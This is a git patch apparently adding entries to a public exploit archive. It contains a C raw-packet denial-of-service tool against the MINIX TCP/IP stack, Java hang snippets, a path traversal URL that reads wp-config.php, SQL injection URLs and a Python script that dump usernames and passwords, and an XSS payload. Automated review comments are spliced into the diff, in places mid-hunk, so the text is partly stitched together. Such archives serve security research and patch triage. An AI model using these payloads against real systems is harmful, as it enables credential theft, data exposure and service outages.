From bf592f75896ee15b0c88ca8110e27f00b84b7ea8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 21 Nov 2014 04:46:52 +0000
Subject: [PATCH] Updated 11_21_2014

---
 files.csv | 7 ++
 platforms/linux/dos/35302.c | 182 +++++++++++++++++++++++++++++++
 platforms/multiple/dos/35304.txt | 30 +++++
 platforms/php/webapps/35301.html | 56 ++++++++++
 platforms/php/webapps/35303.txt | 24 ++++
 platforms/php/webapps/35305.txt | 9 ++
 platforms/php/webapps/35306.txt | 9 ++
 platforms/php/webapps/35307.py | 34 ++++++
 8 files changed, 351 insertions(+)
 create mode 100755 platforms/linux/dos/35302.c
 create mode 100755 platforms/multiple/dos/35304.txt
 create mode 100755 platforms/php/webapps/35301.html
 create mode 100755 platforms/php/webapps/35303.txt
 create mode 100755 platforms/php/webapps/35305.txt
 create mode 100755 platforms/php/webapps/35306.txt
 create mode 100755 platforms/php/webapps/35307.py

diff --git a/files.csv b/files.csv
index b42109311..817302eea 100755
--- a/files.csv
+++ b/files.csv
@@ -31793,3 +31793,10 @@ id,file,description,date,author,platform,type,port
 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 'PHPCOVERAGE_HOME' Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 Cross Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0
 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 'id' Parameter Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
+35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80
+35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337
+35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80
+35304,platforms/multiple/dos/35304.txt,"Oracle Java Floating-Point Value Denial of Service Vulnerability",2011-02-01,"Konstantin Preisser",multiple,dos,0
+35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
+35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 'user_password' Parameter Cross Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0
+35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0
diff --git a/platforms/linux/dos/35302.c b/platforms/linux/dos/35302.c
new file mode 100755
index 000000000..8fca880e4
--- /dev/null
+++ b/platforms/linux/dos/35302.c
@@ -0,0 +1,182 @@ +/* + _-------------------------------------------------------_ + ||------+ MINIX <= 3.3.0 Remote TCP/IP Stack DoS +------|| + ||_______________________________________________________|| + ||--=[ Alejandro Hernandez < nitr0us > ]=--|| + ||--=[ Nov 2014 ]=--|| + ||--=[ Mexico ]=--|| + -_______________________________________________________- +_____________________________________________________________________________________ + + MINIX IS PRONE TO DENIAL OF SERVICE IN THE TCP/IP STACK (/service/inet) BY SENDING + A SINGLE TCP PACKET WITH A MALFORMED TCP OPTION. A TCP OPTION WITH LENGTH OF ZERO + WOULD CAUSE inet TO END UP IN AN INFINITE LOOP. + + BECAUSE OF MINIX'S MICROKERNEL NATURE, THE NETWORKING SERVICE RUNS IN USERLAND AND + THEREFORE, THE MOST CRITICAL PARTS OF THE RUNNING KERNEL ARE UNAFFECTED. + + THIS ISSUE HAS BEEN REPORTED AND ALREADY FIXED: + https://github.com/Stichting-MINIX-Research-Foundation/minix/issues/7 +_____________________________________________________________________________________ + + MINIX 3 + http://minix3.org + + Microkernel (Slide 26) + http://www.eecs.harvard.edu/~mdw/course/cs161/notes/osstructure.pdf + + TCP Option Kind Numbers + http://www.iana.org/assignments/tcp-parameters/tcp-parameters.xhtml#tcp-parameters-1 +_____________________________________________________________________________________ + +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define __FAVOR_BSD 1 /* Use BSD's tcp header style */ +#include + +#define IPSIZE sizeof(struct ip) +#define TCPSIZE sizeof(struct tcphdr) + +#define DEFAULT_SRC_IP "1.3.3.7" + +uint16_t _checksum(uint16_t * addr, int len) { + int nleft = len; + int sum = 0; + + uint16_t *w = addr; + uint16_t answer = 0; + + while(nleft > 1){ + sum += *w++; + nleft -= sizeof(uint16_t); + } + + if(nleft == 1){ + *(uint8_t *) (&answer) = *(uint8_t *) w; + sum += answer; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum 
+= (sum >> 16); + answer = ~sum; + + return (answer); +} + +int main(int argc, char **argv) +{ + char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4); + char *srcip = DEFAULT_SRC_IP; + int sockfd, count; + int pseudo_hdr_size = 12 + TCPSIZE + 4; // 12 bytes for the pseudo-header; 4 bytes for the payload + int one = 1; /* setsockopt() */ + struct sockaddr_in target; + struct hostent *host2ip; + struct ip *IP = (struct ip *) packet; + struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE); + unsigned char pseudo_hdr_for_checksum[pseudo_hdr_size]; + + if(argc < 2){ + printf(" _-------------------------------------------------------_\n"); + printf(" ||------+ MINIX <= 3.3.0 Remote TCP/IP Stack DoS +------||\n"); + printf(" -_______________________________________________________-\n\n"); + printf("Usage: %s \n", argv[0]); + + exit(-1); + } + + if((host2ip = gethostbyname(argv[1])) == NULL){ + perror("gethostbyname"); + exit(-1); + } + + if(getuid() != 0){ + fprintf(stderr, "You must be root to create raw sockets.\n"); + exit(-1); + } + + memset(packet, 0x00, sizeof(packet)); + memset(&target, 0x00, sizeof(target)); + + target.sin_family = AF_INET; + target.sin_port = htons(31337); + target.sin_addr = *((struct in_addr *)host2ip->h_addr); + + /*** SEMI-VALID TCP/IP PACKET ***/ + IP->ip_src.s_addr = inet_addr(srcip); + IP->ip_dst.s_addr = target.sin_addr.s_addr; + IP->ip_hl = 0x05; + IP->ip_v = 0x04; + IP->ip_tos = 0x00; + IP->ip_len = htons(IPSIZE + TCPSIZE + 4); + IP->ip_id = 0x01; + IP->ip_ttl = 0xff; + IP->ip_p = IPPROTO_TCP; + IP->ip_sum = _checksum((uint16_t *) IP, IPSIZE); + + TCP->th_sport = htons(0xcafe); + TCP->th_dport = htons(31337); + TCP->th_seq = htonl(rand()); + TCP->th_ack = htonl(rand()); + TCP->th_off = ((TCPSIZE + 4) / 4); + TCP->th_win = htons(0x1337); + TCP->th_flags = rand() & 0x0f; + TCP->th_sum = 0x00; + + /* Malformed TCP Options + Initially tested with "\x03\x00\x00\x00" but realized that MINIX 3 hangs even with 2, 3, 4, 5, + 6, 7, 8, 0x7f, 
0xff, in the first byte. Then, I found out that if the option size (the 2nd byte) + is higher than zero, the stack doesn't hang. For this PoC, "\xff\x00\x00\x00" is used: */ + memcpy(packet + IPSIZE + TCPSIZE, "\xff\x00\x00\x00", 4); + + // TCP Checksum Calculation and the TCP "Pseudo Header" + // http://www.tcpipguide.com/free/t_TCPChecksumCalculationandtheTCPPseudoHeader-2.htm + memset(pseudo_hdr_for_checksum, 0x00, pseudo_hdr_size); + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 0)) = IP->ip_src.s_addr; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 4)) = IP->ip_dst.s_addr; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 8)) = 0x00; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 9)) = IPPROTO_TCP; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 10)) = htons(TCPSIZE + 4); + memcpy(pseudo_hdr_for_checksum + 12, ((unsigned char *) packet) + IPSIZE, TCPSIZE + 4); + + TCP->th_sum = _checksum((uint16_t *) &pseudo_hdr_for_checksum, pseudo_hdr_size); + + printf("-=[ Computed IP header checksum: IP->ip_sum = 0x%x\n", IP->ip_sum); + printf("-=[ Computed TCP header checksum: TCP->th_sum = 0x%x\n\n", TCP->th_sum); + printf("-=[ Sending malformed TCP/IP packet...\n\n"); + + if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){ + perror("socket"); + exit(-1); + } + + if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){ + perror("setsockopt"); + exit(-1); + } + + if((count = sendto(sockfd, packet, IPSIZE + TCPSIZE + 4, 0, (struct sockaddr *) &target, sizeof(target))) == -1){ + perror("sendto"); + close(sockfd); + exit(-1); + } + + close(sockfd); + + printf("-=[ Sent %d bytes to %s:31337\n", count, argv[1]); + printf("-=[ TCP/IP stack should be hanged now\n"); + printf("-=[ Try to ping %s... \n", argv[1]); + + return 0; +} diff --git a/platforms/multiple/dos/35304.txt b/platforms/multiple/dos/35304.txt new file mode 100755 index 000000000..97b1f5e8f 
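Review bot: `memset(packet, 0x00, sizeof(packet));` in main zeroes only sizeof(char *) bytes of the 44-byte heap buffer, because packet is a pointer, so every IP/TCP field the code does not assign explicitly (e.g. ip_off, th_urp) is left with whatever malloc returned; the size used everywhere else is the intended one, `memset(packet, 0x00, IPSIZE + TCPSIZE + 4);`. The malloc() result is never checked and never freed, and rand() is unseeded, so the seq/ack/flags values are identical on every run — worth a comment if that is deliberate. The pseudo-header is filled with `unsigned long` stores at byte offsets 8, 9 and 10; on LP64 targets each store is 8 bytes wide and they overlap, and the result is only correct because the memcpy at offset 12 overwrites the spill afterwards — plain byte/uint16_t stores (`pseudo_hdr_for_checksum[9] = IPPROTO_TCP;`) would make the layout explicit and portable. The header comment already cites the upstream fix (issue #7), which is the relevant mitigation for anyone triaging this.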
--- /dev/null +++ b/platforms/multiple/dos/35304.txt @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/46091/info + +Oracle Java is prone to a remote denial-of-service vulnerability. + +Successful attacks will cause applications written in Java to hang, creating a denial-of-service condition. + +This issue affects both the Java compiler and Runtime Environment. + +Send a Java Program Into An Infinite Loop + +Compile this program and run it; the program will hang (at least it does on a 32-bit system with the latest JRE/JDK): + +class runhang { +public static void main(String[] args) { + System.out.println("Test:"); + double d = Double.parseDouble("2.2250738585072012e-308"); + System.out.println("Value: " + d); + } +} + +Send the Java Compiler Into An Infinite Loop + +Try to compile this program; the compiler will hang: + +class compilehang { +public static void main(String[] args) { + double d = 2.2250738585072012e-308; + System.out.println("Value: " + d); + } +} \ No newline at end of file diff --git a/platforms/php/webapps/35301.html b/platforms/php/webapps/35301.html new file mode 100755 index 000000000..5d00b624a --- /dev/null +++ b/platforms/php/webapps/35301.html @@ -0,0 +1,56 @@ +? + + + + +
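Review bot: The advisory names neither the affected Java versions nor the vendor fix; the qualifier `at least it does on a 32-bit system with the latest JRE/JDK` was meaningful in February 2011 but cannot be resolved by a reader of this 2014 import. One line such as `Affected: JDK/JRE builds current as of 2011-02-01 — see the vendor bulletin for the patched release` (with the real version numbers taken from the vendor bulletin) would let a defender decide whether a deployment is still exposed. It would also help to state that the hang is in Double.parseDouble and the compiler's literal parsing of the same value, which is what the two snippets demonstrate but the prose never says.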
+ + + + + + + + + + + +
+
+
diff --git a/platforms/php/webapps/35303.txt b/platforms/php/webapps/35303.txt
new file mode 100755
index 000000000..b20a8b256
--- /dev/null
+++ b/platforms/php/webapps/35303.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Paid Memberships Pro 1.7.14.2 Path Traversal
+# Date: 14-10-2014
+# Exploit Author: Kacper Szurek - http://security.szurek.pl
+# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.1.7.14.2.zip
+# Category: webapps
+# CVE: CVE-2014-8801
+
+1. Description
+
+getfile.php is accessible to everyone.
+is_admin() is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true.
+$_SERVER['REQUEST_URI'] is not escaped.
+
+http://security.szurek.pl/paid-memberships-pro-17142-path-traversal.html
+
+2. Proof of Concept
+
+http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
+
+3. Solution:
+
+Update to version 1.7.15
+http://downloads.wordpress.org/plugin/paid-memberships-pro.1.7.15.zip
+http://www.paidmembershipspro.com/2014/11/critical-security-update-pmpro-v1-7-15/
\ No newline at end of file
diff --git a/platforms/php/webapps/35305.txt b/platforms/php/webapps/35305.txt
new file mode 100755
index 000000000..59fa74a10
--- /dev/null
+++ b/platforms/php/webapps/35305.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46095/info
+
+ACollab is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+ACollab 1.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a
\ No newline at end of file
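Review bot: The root-cause line `is_admin() is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true.` states the symptom but not the reason: WordPress's is_admin() only reports whether an admin-side script is serving the request — admin-ajax.php is one, even for unauthenticated callers — and it is not a capability or authentication check. One sentence naming the correct control would make the advisory actionable for defenders, e.g. `Root cause: is_admin() is not an authorization check; getfile.php should gate on current_user_can() (plus a nonce) and derive the file path from a validated parameter rather than $_SERVER['REQUEST_URI'].` The same line also has the typos "priveleges" and "evalute".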
diff --git a/platforms/php/webapps/35306.txt b/platforms/php/webapps/35306.txt
new file mode 100755
index 000000000..2c0e42c2f
--- /dev/null
+++ b/platforms/php/webapps/35306.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46096/info
+
+TCExam is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+TCExam 11.1.016 is vulnerable; other versions may also be affected.
+
+http://www.example.com/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden
\ No newline at end of file
diff --git a/platforms/php/webapps/35307.py b/platforms/php/webapps/35307.py
new file mode 100755
index 000000000..f453f4195
--- /dev/null
+++ b/platforms/php/webapps/35307.py
@@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/46097/info + +All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +AIOCP 1.4.001 is vulnerable; other versions may also be affected. + +import re, socket + +host = 'localhost' +port = 80 + +r = re.compile('\'([^\']+):([^\s]+)\sLIMIT') + +# Search user ids 0 through 16 +for i in range(0,16): + + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + s.send("GET /AIOCP/public/code/cp_menu_data_file.php?menu='or%201=1%20UNION%20ALL%20SELECT%201,0,CONCAT(',',user_name,':',user_password)%20as%20menulst_name,0%20FROM%20aiocp_users%20ORDER%20BY%20menulst_style%20LIMIT%20" + str(i) + ",1;%23 HTTP/1.1\r\n" + 'Host: ' + host + '\r\n' + '\r\n') + + resp = s.recv(8192) + + m = r.search(resp) + + if m is None: continue + + print 'Username: ' + m.group(1) + '\nPassword: ' + m.group(2) + '\n' +
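Review bot: The file is not valid Python as committed: the advisory prose on its first seven lines (`source: http://www.securityfocus.com/bid/46097/info` through `AIOCP 1.4.001 is vulnerable; ...`) sits outside any comment, so the interpreter raises a SyntaxError before it reaches `import re, socket`; prefixing each of those lines with `# ` is the minimal fix. The comment `# Search user ids 0 through 16` disagrees with `for i in range(0,16):`, which covers 0 through 15. Each iteration creates a socket that is never closed, and the single `resp = s.recv(8192)` is treated as the whole HTTP response with no handling of a short read; an `s.close()` at the end of the loop body would at least remove the descriptor leak. The script is Python 2 (`print` statement, str-based send) and carries no `#!` line despite its 100755 mode, which is worth stating in the header.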